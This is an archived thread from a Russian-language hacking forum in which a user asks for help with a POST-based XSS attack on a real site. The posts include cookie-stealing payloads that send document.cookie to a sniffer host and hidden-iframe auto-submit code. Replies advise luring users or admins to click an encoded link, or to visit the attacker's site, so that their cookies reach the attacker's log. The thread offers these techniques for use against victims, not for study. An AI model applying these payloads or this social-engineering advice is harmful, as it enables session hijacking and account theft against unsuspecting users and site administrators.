ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

28.01.2012, 18:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 1927
Репутация:
0
|
|
Недавно я нашел xss POST пассивку уязвимость на неком сайте site.com. Мною был создан сайт на бесплатном хостинге, где была размещена моя html страница, с framom, который открывает нашу страницу site.com/index.html, вводит скрипт в нашу форму "POST" и подтверждает её. В результате frame выводит его на http://evilhost.ru/user/login_form?login=xxx
В фрейме выполняется код по нашей форме "POST" и его перекидывает на бесплатный сниффер
document.location.href="http://sniff/s.php?"+document.cookie;'> Вот код на странице моего сайта:
alert(document.cookie)">
window.onload = function(){
var win = document.getElementById("iframe").contentWindow;
document.getElementById("form").onsubmit = function(e){
win.postMessage( document.getElementById("log").value );
win.postMessage( document.getElementById("pass").value );
win.postMessage( document.getElementById("pag").value );
e.preventDefault();
};
};
Если я в брузере ОПЕРА набираю свой сайт-приманку , он должен показать мне cookie c http://сайт с ХСС/user/login_form , выскакивает окошко :siteowner=1 и все .Получается cookie при загрузке iframe не передаются .Если отправляю iframe на сниффер то приходит:QUERY:siteowner=1, REFERER: http://мой_Сайт/form.html ,AGENT:Opera/9.80 (Windows.. и все.
ПОЧЕМУ в СКРИПТ script>alert(document.cookie) cookie не передаются ? Help...
|
|
|
|

29.01.2012, 00:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 290351
Репутация:
173
|
|
нихуя ты закатил речь, проще обьясни что ты зделал?
|
|
|
|

29.01.2012, 01:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
Я сам новичок в этом но с xss разобрался.
В этой статье все написано. Проще зделай как я : зарегся на online xss snifer тут , там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи.
|
|
|
|

29.01.2012, 10:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 1927
Репутация:
0
|
|
Сообщение от NZT
NZT said:
Я сам новичок в этом но с xss разобрался.
В
этой
статье все написано. Проще зделай как я : зарегся на online xss snifer
тут
, там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи.
Так я и пользуюсь бесплатным online snifer , я же писал. Проблема
найти ошибку в моем post-запросе лежащем на моем сайте (см. выше). Ссылка типа: http://сайт сХСС/user/form?Login=akxhijfa&page= - ЭТО GET запрос , а уменя POST XSS....КАК сделать ссылку
,чтобы при нажатии на нее подгружалась заранее заполненная нами форма и чтобы она автоматом перебрасывала куки на snifer?
|
|
|
|

30.01.2012, 22:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 1927
Репутация:
0
|
|
Неужели такого рода уязвимость можно применить только в сочетании с CSRF ? Ну где же Вы спецы ?
|
|
|
|

31.01.2012, 09:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Можно и POST юзнуть. Но только тебе придется заманить жертву на свой сайт, а потом уже со своего сайта редиректить на сайт жертвы.
|
|
|
|

31.01.2012, 12:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 1927
Репутация:
0
|
|
Цель именно такая , я заманиваю жертву ,подкидывая ему ссылку на свой сайт и с помощью этого кода ,c скрытым iframe:
Ferst;
function submit_form(){
window.evilframe.document.forms[0].submit();
}
он отправляется на заранее сформированную мною форму,которая сабмитит на сайт жертвы (уязвимый сайт с ХСС):
FORMA
img = new Image(); img.src = "http://сниффер"+document.cookie;"> //куки отправляются на сниффер
По идей куки должны приити ,но приходит только USER_AGENT,REFERER,IP,дата ,работу снифера проверял - работает,получается при переходе на мой сайт и отправке формы, в cookie ничего нет(просто пусто)... CSRF-защита или я что-то делаю не так?
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|